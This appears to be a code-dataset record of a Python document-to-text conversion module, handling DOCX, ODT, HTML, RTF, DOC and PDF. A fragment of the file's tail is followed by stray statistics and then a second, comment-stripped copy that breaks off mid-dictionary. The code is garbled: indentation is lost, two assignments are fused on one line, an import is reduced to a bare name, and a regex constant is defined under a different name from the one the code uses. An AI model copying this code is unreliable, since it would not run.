- https://github.com/deanmalmgren/textract/pull/92
- ``docx2txt`` is at https://pypi.python.org/pypi/docx2txt/0.6; this is
pure Python. Its command-line function appears to be for Python 2 only
(2016-04-21: crashes under Python 3; is due to an encoding bug). However,
it seems fine as a library. It doesn't handle in-memory blobs properly,
though, so we need to extend it.
PERFORMANCE OF ITS ``process()`` function:
- all text comes out
- table text is in a sensible place
- table formatting is lost.
- Other manual methods (not yet implemented):
http://etienned.github.io/posts/extract-text-from-word-docx-simply/.
Looks like it won't deal with header stuff (etc.) that ``docx2txt``
handles.
- Upshot: we need a DIY version.
    - See also this "compile lots of techniques" library, which has C
      dependencies: http://textract.readthedocs.org/en/latest/
"""
text = ''
with get_filelikeobject(filename, blob) as fp:
for xml in gen_xml_files_from_docx(fp):
text += docx_text_from_xml(xml, config)
return text
# elif docx:
# with get_filelikeobject(filename, blob) as fp:
# # noinspection PyUnresolvedReferences
# document = docx.Document(fp)
# return '\n\n'.join(
# docx_docx_gen_text(document, config))
# elif docx2txt:
# if filename:
# return docx2txt.process(filename)
# else:
# raise NotImplementedError("docx2txt BLOB handling not written")
# else:
# raise AssertionError("No DOCX-reading tool available")
# =============================================================================
# ODT
# =============================================================================
# noinspection PyUnusedLocal
def convert_odt_to_text(filename: str = None,
blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
"""
Converts an OpenOffice ODT file to text.
Pass either a filename or a binary object.
"""
# We can't use exactly the same method as for DOCX files, using docx:
# sometimes that works, but sometimes it falls over with:
# KeyError: "There is no item named 'word/document.xml' in the archive"
with get_filelikeobject(filename, blob) as fp:
z = zipfile.ZipFile(fp)
tree = ElementTree.fromstring(z.read('content.xml'))
# ... may raise zipfile.BadZipfile
textlist = [] # type: List[str]
for element in tree.iter():
if element.text:
textlist.append(element.text.strip())
return '\n\n'.join(textlist)
# =============================================================================
# HTML
# =============================================================================
# noinspection PyUnusedLocal
def convert_html_to_text(
filename: str = None,
blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
"""
Converts HTML to text.
"""
with get_filelikeobject(filename, blob) as fp:
        soup = bs4.BeautifulSoup(fp, "html.parser")  # explicit pure-Python parser
return soup.get_text()
# =============================================================================
# XML
# =============================================================================
# noinspection PyUnusedLocal
def convert_xml_to_text(filename: str = None,
blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
"""
Converts XML to text.
"""
with get_filelikeobject(filename, blob) as fp:
soup = bs4.BeautifulStoneSoup(fp)
return soup.get_text()
# =============================================================================
# RTF
# =============================================================================
# noinspection PyUnresolvedReferences,PyUnusedLocal
def convert_rtf_to_text(filename: str = None,
blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
"""
Converts RTF to text.
"""
unrtf = tools['unrtf']
if unrtf: # Best
args = [unrtf, '--text', '--nopict']
if UNRTF_SUPPORTS_QUIET:
args.append('--quiet')
if filename:
args.append(filename)
return get_cmd_output(*args)
else:
return get_cmd_output_from_stdin(blob, *args)
elif pyth: # Very memory-consuming:
# https://github.com/brendonh/pyth/blob/master/pyth/plugins/rtf15/reader.py # noqa
with get_filelikeobject(filename, blob) as fp:
doc = pyth.plugins.rtf15.reader.Rtf15Reader.read(fp)
return (
pyth.plugins.plaintext.writer.PlaintextWriter.write(doc).getvalue()
)
else:
raise AssertionError("No RTF-reading tool available")
def availability_rtf() -> bool:
"""
Is an RTF processor available?
"""
unrtf = tools['unrtf']
if unrtf:
return True
elif pyth:
log.warning("RTF conversion: unrtf missing; "
"using pyth (less efficient)")
return True
else:
return False
# =============================================================================
# DOC
# =============================================================================
# noinspection PyUnusedLocal
def convert_doc_to_text(filename: str = None,
blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
"""
Converts Microsoft Word DOC files to text.
"""
antiword = tools['antiword']
if antiword:
if filename:
return get_cmd_output(antiword, '-w', str(config.width), filename)
else:
return get_cmd_output_from_stdin(blob, antiword, '-w',
str(config.width), '-')
else:
raise AssertionError("No DOC-reading tool available")
def availability_doc() -> bool:
"""
Is a DOC processor available?
"""
antiword = tools['antiword']
return bool(antiword)
# =============================================================================
# Anything
# =============================================================================
# noinspection PyUnusedLocal
def convert_anything_to_text(
filename: str = None,
blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
"""
Convert arbitrary files to text, using ``strings`` or ``strings2``.
(``strings`` is a standard Unix command to get text from any old rubbish.)
"""
strings = tools['strings'] or tools['strings2']
if strings:
if filename:
return get_cmd_output(strings, filename)
else:
return get_cmd_output_from_stdin(blob, strings)
else:
raise AssertionError("No fallback string-reading tool available")
def availability_anything() -> bool:
"""
Is a generic "something-to-text" processor available?
"""
strings = tools['strings'] or tools['strings2']
return bool(strings)
# =============================================================================
# Decider
# =============================================================================
ext_map = {
# Converter functions must be of the form: func(filename, blob, config).
# Availability must be either a boolean literal or a function that takes no
# params.
'.csv': {
CONVERTER: get_file_contents_text,
AVAILABILITY: True,
},
'.doc': {
CONVERTER: convert_doc_to_text,
AVAILABILITY: availability_doc,
},
'.docm': {
CONVERTER: convert_docx_to_text,
AVAILABILITY: True,
},
'.docx': {
CONVERTER: convert_docx_to_text,
AVAILABILITY: True,
},
'.dot': {
CONVERTER: convert_doc_to_text,
AVAILABILITY: availability_doc,
},
'.htm': {
CONVERTER: convert_html_to_text,
AVAILABILITY: True,
},
'.html': {
CONVERTER: convert_html_to_text,
AVAILABILITY: True,
},
'.log': {
CONVERTER: get_file_contents_text,
AVAILABILITY: True,
},
# .msg is often Outlook binary, not text
#
# '.msg': {
# CONVERTER: get_file_contents_text,
# AVAILABILITY: True,
# },
'.odt': {
CONVERTER: convert_odt_to_text,
AVAILABILITY: True,
},
'.pdf': {
CONVERTER: convert_pdf_to_txt,
AVAILABILITY: availability_pdf,
},
'.rtf': {
CONVERTER: convert_rtf_to_text,
AVAILABILITY: availability_rtf,
},
'.txt': {
CONVERTER: get_file_contents_text,
AVAILABILITY: True,
},
'.xml': {
CONVERTER: convert_xml_to_text,
AVAILABILITY: True,
},
None: { # fallback
CONVERTER: convert_anything_to_text,
AVAILABILITY: availability_anything,
},
}
def document_to_text(filename: str = None,
blob: bytes = None,
extension: str = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
"""
Converts a document to text.
This function selects a processor based on the file extension (either from
the filename, or, in the case of a BLOB, the extension specified manually
via the ``extension`` parameter).
Pass either a filename or a binary object.
Args:
filename:
the filename to read
blob:
binary content (alternative to ``filename``)
extension:
file extension, used as a hint when ``blob`` is used
config:
an optional :class:`TextProcessingConfig` object
Returns:
Returns a string if the file was processed (potentially an empty
string).
Raises:
Raises an exception for malformed arguments, missing files, bad
filetypes, etc.
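    Example (a minimal sketch; the filename and ``pdf_bytes`` are
    hypothetical):
    .. code-block:: python
        text = document_to_text(filename="letter.doc")
        text = document_to_text(blob=pdf_bytes, extension=".pdf")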
"""
if not filename and not blob:
raise ValueError("document_to_text: no filename and no blob")
if filename and blob:
raise ValueError("document_to_text: specify either filename or blob")
if blob and not extension:
raise ValueError("document_to_text: need extension hint for blob")
if filename:
stub, extension = os.path.splitext(filename)
else:
        if not extension.startswith("."):
extension = "." + extension
extension = extension.lower()
# Ensure blob is an appropriate type
log.debug(
f"filename: {filename}, blob type: {type(blob)}, "
f"blob length: {len(blob) if blob is not None else None}, "
f"extension: {extension}")
# If we were given a filename and the file doesn't exist, don't bother.
if filename and not os.path.isfile(filename):
raise ValueError(f"document_to_text: no such file: {filename!r}")
# Choose method
info = ext_map.get(extension)
if info is None:
log.warning("Unknown filetype: {}; using generic tool", extension)
info = ext_map[None]
func = info[CONVERTER]
text = func(filename, blob, config)
if config.rstrip:
text = rstrip_all_lines(text)
return text
def is_text_extractor_available(extension: str) -> bool:
"""
Is a text extractor available for the specified extension?
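    Example:
    .. code-block:: python
        is_text_extractor_available(".docx")  # True; pure-Python converter
        is_text_extractor_available(None)  # is the generic fallback present?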
"""
if extension is not None:
extension = extension.lower()
info = ext_map.get(extension)
if info is None:
return False
availability = info[AVAILABILITY]
    if isinstance(availability, bool):
return availability
elif callable(availability):
return availability()
else:
raise ValueError(
f"Bad information object for extension: {extension}")
def require_text_extractor(extension: str) -> None:
"""
Require that a text extractor is available for the specified extension,
or raise :exc:`ValueError`.
"""
if not is_text_extractor_available(extension):
raise ValueError(
f"No text extractor available for extension: {extension}")
# =============================================================================
# main, for command-line use
# =============================================================================
def main() -> None:
"""
Command-line processor. See ``--help`` for details.
"""
logging.basicConfig(level=logging.DEBUG)
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("inputfile", nargs="?", help="Input file name")
parser.add_argument(
"--availability", nargs='*',
help="File extensions to check availability for (use a '.' prefix, "
"and use the special extension 'None' to check the fallback "
"processor")
parser.add_argument(
'--plain', action='store_true',
help="Use plainest format (re e.g. table layouts)")
parser.add_argument(
'--semiplain', action='store_true',
help="Use semi-plain format (re e.g. table layouts)")
parser.add_argument(
"--width", type=int, default=DEFAULT_WIDTH,
help=f"Word wrapping width")
parser.add_argument(
"--min-col-width", type=int, default=DEFAULT_MIN_COL_WIDTH,
help=f"Minimum column width for tables")
args = parser.parse_args()
if args.availability:
for ext in args.availability:
if ext.lower() == 'none':
ext = None
available = is_text_extractor_available(ext)
print(f"Extractor for extension {ext} present: {available}")
return
if not args.inputfile:
parser.print_help(sys.stderr)
return
config = TextProcessingConfig(
width=args.width,
min_col_width=args.min_col_width,
plain=args.plain,
semiplain=args.semiplain,
)
result = document_to_text(filename=args.inputfile, config=config)
if result is None:
return
else:
print(result)
if __name__ == '__main__':
main()
# *** antiword -w width
| 32.857687
| 118
| 0.56899
|
import argparse
from io import StringIO
import io
import logging
import os
import re
import shutil
import subprocess
import sys
import textwrap
from typing import (
BinaryIO, Dict, Generator, Iterable, Iterator, List, Optional, Union,
)
from xml.etree import ElementTree as ElementTree
import zipfile
import bs4
import prettytable
from semantic_version import Version
get_brace_style_log_with_null_handler
try:
import chardet
from chardet.universaldetector import UniversalDetector
except ImportError:
chardet = None
UniversalDetector = None
try:
# noinspection PyPackageRequirements
import docx # pip install python-docx (NOT docx) - BUT python-docx requires lxml which has C dependencies # noqa
# noinspection PyPackageRequirements
import docx.document
# noinspection PyPackageRequirements
import docx.oxml.table
# noinspection PyPackageRequirements
import docx.oxml.text.paragraph
# noinspection PyPackageRequirements
import docx.table
# noinspection PyPackageRequirements
import docx.text.paragraph
DOCX_DOCUMENT_TYPE = "docx.document.Document"
DOCX_TABLE_TYPE = Union["docx.table.Table", "CustomDocxTable"]
DOCX_CONTAINER_TYPE = Union[DOCX_DOCUMENT_TYPE, "docx.table._Cell"]
DOCX_BLOCK_ITEM_TYPE = Union["docx.text.paragraph.Paragraph",
"docx.table.Table"]
except ImportError:
docx = None
DOCX_DOCUMENT_TYPE = None
DOCX_TABLE_TYPE = "CustomDocxTable"
DOCX_CONTAINER_TYPE = None
DOCX_BLOCK_ITEM_TYPE = None
try:
import docx2txt # pip install docx2txt
except ImportError:
docx2txt = None
try:
# noinspection PyPackageRequirements
import pdfminer # pip install pdfminer
# noinspection PyPackageRequirements
import pdfminer.pdfinterp
# noinspection PyPackageRequirements
import pdfminer.converter
# noinspection PyPackageRequirements
import pdfminer.layout
# noinspection PyPackageRequirements
import pdfminer.pdfpage
except ImportError:
pdfminer = None
try:
# noinspection PyPackageRequirements
import pyth # pip install pyth (PYTHON 2 ONLY; https://pypi.python.org/pypi/pyth/0.5.4) # noqa
# noinspection PyPackageRequirements
import pyth.plugins.rtf15.reader
# noinspection PyPackageRequirements
import pyth.plugins.plaintext.writer
except ImportError:
pyth = None
log = get_brace_style_log_with_null_handler(__name__)
# =============================================================================
# Constants
# =============================================================================
AVAILABILITY = 'availability'
CONVERTER = 'converter'
DEFAULT_WIDTH = 120
DEFAULT_MIN_COL_WIDTH = 15
SYS_ENCODING = sys.getdefaultencoding()
ENCODING = "utf-8"
# =============================================================================
# External tool map
# =============================================================================
tools = {
'antiword': shutil.which('antiword'), # sudo apt-get install antiword
'pdftotext': shutil.which('pdftotext'), # core part of Linux?
'strings': shutil.which('strings'), # part of standard Unix
'strings2': shutil.which('strings2'),
# ... Windows: https://technet.microsoft.com/en-us/sysinternals/strings.aspx # noqa
# ... Windows: http://split-code.com/strings2.html
'unrtf': shutil.which('unrtf'), # sudo apt-get install unrtf
}
def does_unrtf_support_quiet() -> bool:
required_unrtf_version = Version("0.21.9")
# ... probably: http://hg.savannah.gnu.org/hgweb/unrtf/
# ... 0.21.9 definitely supports --quiet
# ... 0.19.3 definitely doesn't support it
unrtf_filename = shutil.which('unrtf')
if not unrtf_filename:
return False
p = subprocess.Popen(["unrtf", "--version"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
_, err_bytes = p.communicate()
text = err_bytes.decode(sys.getdefaultencoding())
lines = text.split()
if len(lines) < 1:
return False
version_str = lines[0]
unrtf_version = Version(version_str)
return unrtf_version >= required_unrtf_version
UNRTF_SUPPORTS_QUIET = does_unrtf_support_quiet()
def update_external_tools(tooldict: Dict[str, str]) -> None:
global tools
tools.update(tooldict)
class TextProcessingConfig(object):
def __init__(self,
encoding: str = None,
width: int = DEFAULT_WIDTH,
min_col_width: int = DEFAULT_MIN_COL_WIDTH,
plain: bool = False,
semiplain: bool = False,
docx_in_order: bool = True,
horizontal_char="─",
vertical_char="│",
junction_char="┼",
plain_table_start: str = None,
plain_table_end: str = None,
plain_table_col_boundary: str = None,
plain_table_row_boundary: str = None,
rstrip: bool = True) -> None:
if plain and semiplain:
log.warning("You specified both plain and semiplain; using plain")
semiplain = False
middlewidth = width - 2 if width > 2 else 77
if plain_table_start is None:
plain_table_start = "╔" + ("═" * middlewidth) + "╗"
if plain_table_end is None:
plain_table_end = "╚" + ("═" * middlewidth) + "╝"
if plain_table_row_boundary is None:
plain_table_row_boundary = "═" * (middlewidth + 2)
if plain_table_col_boundary is None:
plain_table_col_boundary = "─" * (middlewidth + 2)
self.encoding = encoding
self.width = width
self.min_col_width = min_col_width
self.plain = plain
self.semiplain = semiplain
self.docx_in_order = docx_in_order
self.horizontal_char = horizontal_char
self.vertical_char = vertical_char
self.junction_char = junction_char
self.plain_table_start = plain_table_start
self.plain_table_end = plain_table_end
self.plain_table_col_boundary = plain_table_col_boundary
self.plain_table_row_boundary = plain_table_row_boundary
self.rstrip = rstrip
_DEFAULT_CONFIG = TextProcessingConfig()
def get_filelikeobject(filename: str = None,
blob: bytes = None) -> BinaryIO:
if not filename and not blob:
raise ValueError("no filename and no blob")
if filename and blob:
raise ValueError("specify either filename or blob")
if filename:
return open(filename, 'rb')
else:
return io.BytesIO(blob)
def get_file_contents(filename: str = None, blob: bytes = None) -> bytes:
if not filename and not blob:
raise ValueError("no filename and no blob")
if filename and blob:
raise ValueError("specify either filename or blob")
if blob:
return blob
with open(filename, 'rb') as f:
return f.read()
def get_chardet_encoding(binary_contents: bytes) -> Optional[str]:
if not binary_contents:
return None
if chardet is None or UniversalDetector is None:
log.warning("chardet not installed; limits detection of encodings")
return None
detector = UniversalDetector()
for byte_line in binary_contents.split(b"\n"):
detector.feed(byte_line)
if detector.done:
break
guess = detector.result
if 'encoding' not in guess:
log.warning("Something went wrong within chardet; no encoding")
return None
return guess['encoding']
def get_file_contents_text(
filename: str = None, blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
binary_contents = get_file_contents(filename=filename, blob=blob)
if config.encoding:
try:
return binary_contents.decode(config.encoding)
except ValueError:
pass
sysdef = sys.getdefaultencoding()
if sysdef != config.encoding:
try:
return binary_contents.decode(sysdef)
except ValueError:
pass
if chardet:
guess = chardet.detect(binary_contents)
if guess['encoding']:
return binary_contents.decode(guess['encoding'])
raise ValueError("Unknown encoding ({})".format(
f"filename={filename!r}" if filename else "blob"))
def get_cmd_output(*args, encoding: str = SYS_ENCODING) -> str:
log.debug("get_cmd_output(): args = {!r}", args)
p = subprocess.Popen(args, stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
return stdout.decode(encoding, errors='ignore')
def get_cmd_output_from_stdin(stdint_content_binary: bytes,
*args, encoding: str = SYS_ENCODING) -> str:
p = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
stdout, stderr = p.communicate(input=stdint_content_binary)
return stdout.decode(encoding, errors='ignore')
def rstrip_all_lines(text: str) -> str:
return "\n".join(
line.rstrip()
for line in text.splitlines()
)
def convert_pdf_to_txt(filename: str = None, blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
pdftotext = tools['pdftotext']
if pdftotext:
if filename:
return get_cmd_output(pdftotext, filename, '-')
else:
return get_cmd_output_from_stdin(blob, pdftotext, '-', '-')
elif pdfminer:
with get_filelikeobject(filename, blob) as fp:
rsrcmgr = pdfminer.pdfinterp.PDFResourceManager()
retstr = StringIO()
codec = ENCODING
laparams = pdfminer.layout.LAParams()
device = pdfminer.converter.TextConverter(
rsrcmgr, retstr, codec=codec, laparams=laparams)
interpreter = pdfminer.pdfinterp.PDFPageInterpreter(rsrcmgr,
device)
password = ""
maxpages = 0
caching = True
pagenos = set()
for page in pdfminer.pdfpage.PDFPage.get_pages(
fp, pagenos, maxpages=maxpages, password=password,
caching=caching, check_extractable=True):
interpreter.process_page(page)
text = retstr.getvalue().decode(ENCODING)
return text
else:
raise AssertionError("No PDF-reading tool available")
def availability_pdf() -> bool:
pdftotext = tools['pdftotext']
if pdftotext:
return True
elif pdfminer:
log.warning("PDF conversion: pdftotext missing; "
"using pdfminer (less efficient)")
return True
else:
return False
_HEADER_FILE_REGEX = re.compile('word/header[0-9]*.xml')
DOCX_DOC_FILE = 'word/document.xml'
DOCX_FOOTER_FILE_REGEX = re.compile('word/footer[0-9]*.xml')
DOCX_SCHEMA_URL = 'http://schemas.openxmlformats.org/wordprocessingml/2006/main'
def docx_qn(tagroot):
return f'{{{DOCX_SCHEMA_URL}}}{tagroot}'
DOCX_TEXT = docx_qn('t')
DOCX_TABLE = docx_qn('tbl') TAB = docx_qn('tab')
DOCX_NEWLINES = [docx_qn('br'), docx_qn('cr')]
DOCX_NEWPARA = docx_qn('p')
DOCX_TABLE_ROW = docx_qn('tr')
DOCX_TABLE_CELL = docx_qn('tc')
def gen_xml_files_from_docx(fp: BinaryIO) -> Iterator[str]:
try:
z = zipfile.ZipFile(fp)
filelist = z.namelist()
for filename in filelist:
if DOCX_HEADER_FILE_REGEX.match(filename):
yield z.read(filename).decode("utf8")
yield z.read(DOCX_DOC_FILE)
for filename in filelist:
if DOCX_FOOTER_FILE_REGEX.match(filename):
yield z.read(filename).decode("utf8")
except zipfile.BadZipFile:
raise zipfile.BadZipFile("File is not a zip file - encrypted DOCX?")
class DocxFragment(object):
def __init__(self, text: str, wordwrap: bool = True) -> None:
self.text = text
self.wordwrap = wordwrap
def docx_gen_wordwrapped_fragments(fragments: Iterable[DocxFragment],
width: int) -> Generator[str, None, None]:
to_wrap = []
def yield_wrapped():
nonlocal to_wrap
if to_wrap:
block = "".join(x.text for x in to_wrap)
wrapped = "\n".join(
wordwrap(line, width)
for line in block.splitlines()
)
yield wrapped
to_wrap.clear()
for f in fragments:
if f.wordwrap:
to_wrap.append(f)
else:
yield from yield_wrapped()
yield f.text
yield from yield_wrapped()
def docx_wordwrap_fragments(fragments: Iterable[DocxFragment],
width: int) -> str:
return "".join(docx_gen_wordwrapped_fragments(fragments, width))
def docx_gen_fragments_from_xml_node(
node: ElementTree.Element,
level: int,
config: TextProcessingConfig) -> Generator[DocxFragment, None, None]:
tag = node.tag
log.debug("Level {}, tag {}", level, tag)
if tag == DOCX_TEXT:
log.debug("Text: {!r}", node.text)
yield DocxFragment(node.text or "")
elif tag == DOCX_TAB:
log.debug("Tab")
yield DocxFragment("\t")
elif tag in DOCX_NEWLINES:
log.debug("Newline")
yield DocxFragment("\n")
elif tag == DOCX_NEWPARA:
log.debug("New paragraph")
yield DocxFragment("\n\n")
if tag == DOCX_TABLE:
log.debug("Table")
yield DocxFragment("\n", wordwrap=False)
yield DocxFragment(docx_table_from_xml_node(node, level, config),
wordwrap=False)
else:
for child in node:
for fragment in docx_gen_fragments_from_xml_node(
child, level + 1, config):
yield fragment
def docx_text_from_xml_node(node: ElementTree.Element,
level: int,
config: TextProcessingConfig) -> str:
return docx_wordwrap_fragments(
docx_gen_fragments_from_xml_node(node, level, config),
config.width)
def docx_text_from_xml(xml: str, config: TextProcessingConfig) -> str:
root = ElementTree.fromstring(xml)
return docx_text_from_xml_node(root, 0, config)
class CustomDocxParagraph(object):
def __init__(self, text: str = '') -> None:
self.text = text or ''
def __repr__(self) -> str:
return f"CustomDocxParagraph(text={self.text!r})"
class CustomDocxTableCell(object):
def __init__(self, paragraphs: List[CustomDocxParagraph] = None) -> None:
self.paragraphs = paragraphs or []
def add_paragraph(self, text: str) -> None:
self.paragraphs.append(CustomDocxParagraph(text))
def __repr__(self) -> str:
return f"CustomDocxTableCell(paragraphs={self.paragraphs!r})"
class CustomDocxTableRow(object):
def __init__(self, cells: List[CustomDocxTableCell] = None) -> None:
self.cells = cells or []
def add_cell(self, cell: CustomDocxTableCell) -> None:
self.cells.append(cell)
def new_cell(self) -> None:
self.cells.append(CustomDocxTableCell())
def add_paragraph(self, text: str) -> None:
self.cells[-1].add_paragraph(text)
def __repr__(self) -> str:
return f"CustomDocxTableRow(cells={self.cells!r})"
class CustomDocxTable(object):
def __init__(self, rows: List[CustomDocxTableRow] = None) -> None:
self.rows = rows or []
def add_row(self, row: CustomDocxTableRow) -> None:
self.rows.append(row)
def new_row(self) -> None:
self.rows.append(CustomDocxTableRow())
def new_cell(self) -> None:
self.rows[-1].new_cell()
def add_paragraph(self, text: str) -> None:
self.rows[-1].add_paragraph(text)
def __repr__(self) -> str:
return f"CustomDocxTable(rows={self.rows!r})"
def docx_table_from_xml_node(table_node: ElementTree.Element,
level: int,
config: TextProcessingConfig) -> str:
table = CustomDocxTable()
for row_node in table_node:
if row_node.tag != DOCX_TABLE_ROW:
continue
table.new_row()
for cell_node in row_node:
if cell_node.tag != DOCX_TABLE_CELL:
continue
table.new_cell()
for para_node in cell_node:
text = docx_text_from_xml_node(para_node, level, config)
if text:
table.add_paragraph(text)
return docx_process_table(table, config)
def wordwrap(text: str, width: int) -> str:
if not text:
return ''
if width:
return '\n'.join(textwrap.wrap(text, width=width))
return text
def docx_process_table(table: DOCX_TABLE_TYPE,
config: TextProcessingConfig) -> str:
def get_cell_text(cell_) -> str:
cellparagraphs = [paragraph.text.strip()
for paragraph in cell_.paragraphs]
cellparagraphs = [x for x in cellparagraphs if x]
return '\n\n'.join(cellparagraphs)
if config.plain:
lines = [config.plain_table_start]
for r, row in enumerate(table.rows):
if r > 0:
lines.append(config.plain_table_row_boundary)
for c, cell in enumerate(row.cells):
if c > 0:
lines.append(config.plain_table_col_boundary)
lines.append(get_cell_text(cell))
lines.append(config.plain_table_end)
return "\n".join(lines)
else:
ncols = 1
for row in table.rows:
ncols = max(ncols, len(row.cells))
pt = prettytable.PrettyTable(
field_names=list(range(ncols)),
encoding=ENCODING,
header=False,
border=True,
hrules=prettytable.ALL,
vrules=prettytable.NONE if config.semiplain else prettytable.ALL,
horizontal_char=config.horizontal_char,
vertical_char=config.vertical_char,
junction_char=config.junction_char,
)
pt.align = 'l'
pt.valign = 't'
pt.max_width = max(config.width // ncols, config.min_col_width)
if config.semiplain:
for row in table.rows:
for i, cell in enumerate(row.cells):
n_before = i
n_after = ncols - i - 1
ptrow = (
[''] * n_before +
[get_cell_text(cell)] +
[''] * n_after
)
assert(len(ptrow) == ncols)
pt.add_row(ptrow)
else:
for row in table.rows:
ptrow = []
for cell in row.cells:
ptrow.append(get_cell_text(cell))
ptrow += [''] * (ncols - len(ptrow))
assert (len(ptrow) == ncols)
pt.add_row(ptrow)
return pt.get_string()
_ = '''
# noinspection PyProtectedMember,PyUnresolvedReferences
def docx_docx_iter_block_items(parent: DOCX_CONTAINER_TYPE) \
-> Iterator[DOCX_BLOCK_ITEM_TYPE]:
"""
Iterate through items of a DOCX file.
See https://github.com/python-openxml/python-docx/issues/40.
Yield each paragraph and table child within ``parent``, in document order.
Each returned value is an instance of either :class:`Table` or
:class:`Paragraph`. ``parent`` would most commonly be a reference to a main
:class:`Document` object, but also works for a :class:`_Cell` object, which
itself can contain paragraphs and tables.
NOTE: uses internals of the ``python-docx`` (``docx``) library; subject to
change; this version works with ``docx==0.8.5``.
"""
if isinstance(parent, docx.document.Document):
parent_elm = parent.element.body
elif isinstance(parent, docx.table._Cell):
parent_elm = parent._tc
else:
raise ValueError("something's not right")
for child in parent_elm.iterchildren():
if isinstance(child, docx.oxml.text.paragraph.CT_P):
yield docx.text.paragraph.Paragraph(child, parent)
elif isinstance(child, docx.oxml.table.CT_Tbl):
yield docx.table.Table(child, parent)
# noinspection PyUnresolvedReferences
def docx_docx_gen_text(doc: DOCX_DOCUMENT_TYPE,
config: TextProcessingConfig) -> Iterator[str]:
"""
Iterate through a DOCX file and yield text.
Args:
doc: DOCX document to process
config: :class:`TextProcessingConfig` control object
Yields:
pieces of text (paragraphs)
"""
if in_order:
for thing in docx_docx_iter_block_items(doc):
if isinstance(thing, docx.text.paragraph.Paragraph):
yield docx_process_simple_text(thing.text, config.width)
elif isinstance(thing, docx.table.Table):
yield docx_process_table(thing, config)
else:
for paragraph in doc.paragraphs:
yield docx_process_simple_text(paragraph.text, config.width)
for table in doc.tables:
yield docx_process_table(table, config)
'''
# noinspection PyUnusedLocal
def convert_docx_to_text(
filename: str = None, blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
text = ''
with get_filelikeobject(filename, blob) as fp:
for xml in gen_xml_files_from_docx(fp):
text += docx_text_from_xml(xml, config)
return text
# elif docx:
# with get_filelikeobject(filename, blob) as fp:
# # noinspection PyUnresolvedReferences
# document = docx.Document(fp)
# return '\n\n'.join(
# docx_docx_gen_text(document, config))
# elif docx2txt:
# if filename:
# return docx2txt.process(filename)
# else:
# raise NotImplementedError("docx2txt BLOB handling not written")
# else:
# raise AssertionError("No DOCX-reading tool available")
# =============================================================================
# ODT
# =============================================================================
# noinspection PyUnusedLocal
def convert_odt_to_text(filename: str = None,
blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
# We can't use exactly the same method as for DOCX files, using docx:
with get_filelikeobject(filename, blob) as fp:
z = zipfile.ZipFile(fp)
tree = ElementTree.fromstring(z.read('content.xml'))
textlist = []
for element in tree.iter():
if element.text:
textlist.append(element.text.strip())
return '\n\n'.join(textlist)
def convert_html_to_text(
filename: str = None,
blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
with get_filelikeobject(filename, blob) as fp:
soup = bs4.BeautifulSoup(fp)
return soup.get_text()
def convert_xml_to_text(filename: str = None,
blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
with get_filelikeobject(filename, blob) as fp:
soup = bs4.BeautifulStoneSoup(fp)
return soup.get_text()
def convert_rtf_to_text(filename: str = None,
blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
unrtf = tools['unrtf']
if unrtf:
args = [unrtf, '--text', '--nopict']
if UNRTF_SUPPORTS_QUIET:
args.append('--quiet')
if filename:
args.append(filename)
return get_cmd_output(*args)
else:
return get_cmd_output_from_stdin(blob, *args)
elif pyth:
with get_filelikeobject(filename, blob) as fp:
doc = pyth.plugins.rtf15.reader.Rtf15Reader.read(fp)
return (
pyth.plugins.plaintext.writer.PlaintextWriter.write(doc).getvalue()
)
else:
raise AssertionError("No RTF-reading tool available")
def availability_rtf() -> bool:
unrtf = tools['unrtf']
if unrtf:
return True
elif pyth:
log.warning("RTF conversion: unrtf missing; "
"using pyth (less efficient)")
return True
else:
return False
def convert_doc_to_text(filename: str = None,
blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
antiword = tools['antiword']
if antiword:
if filename:
return get_cmd_output(antiword, '-w', str(config.width), filename)
else:
return get_cmd_output_from_stdin(blob, antiword, '-w',
str(config.width), '-')
else:
raise AssertionError("No DOC-reading tool available")
def availability_doc() -> bool:
antiword = tools['antiword']
return bool(antiword)
def convert_anything_to_text(
filename: str = None,
blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
strings = tools['strings'] or tools['strings2']
if strings:
if filename:
return get_cmd_output(strings, filename)
else:
return get_cmd_output_from_stdin(blob, strings)
else:
raise AssertionError("No fallback string-reading tool available")
def availability_anything() -> bool:
strings = tools['strings'] or tools['strings2']
return bool(strings)
ext_map = {
'.csv': {
CONVERTER: get_file_contents_text,
AVAILABILITY: True,
},
'.doc': {
CONVERTER: convert_doc_to_text,
AVAILABILITY: availability_doc,
},
'.docm': {
CONVERTER: convert_docx_to_text,
AVAILABILITY: True,
},
'.docx': {
CONVERTER: convert_docx_to_text,
AVAILABILITY: True,
},
'.dot': {
CONVERTER: convert_doc_to_text,
AVAILABILITY: availability_doc,
},
'.htm': {
CONVERTER: convert_html_to_text,
AVAILABILITY: True,
},
'.html': {
CONVERTER: convert_html_to_text,
AVAILABILITY: True,
},
'.log': {
CONVERTER: get_file_contents_text,
AVAILABILITY: True,
},
'.odt': {
CONVERTER: convert_odt_to_text,
AVAILABILITY: True,
},
'.pdf': {
CONVERTER: convert_pdf_to_txt,
AVAILABILITY: availability_pdf,
},
'.rtf': {
CONVERTER: convert_rtf_to_text,
AVAILABILITY: availability_rtf,
},
'.txt': {
CONVERTER: get_file_contents_text,
AVAILABILITY: True,
},
'.xml': {
CONVERTER: convert_xml_to_text,
AVAILABILITY: True,
},
None: {
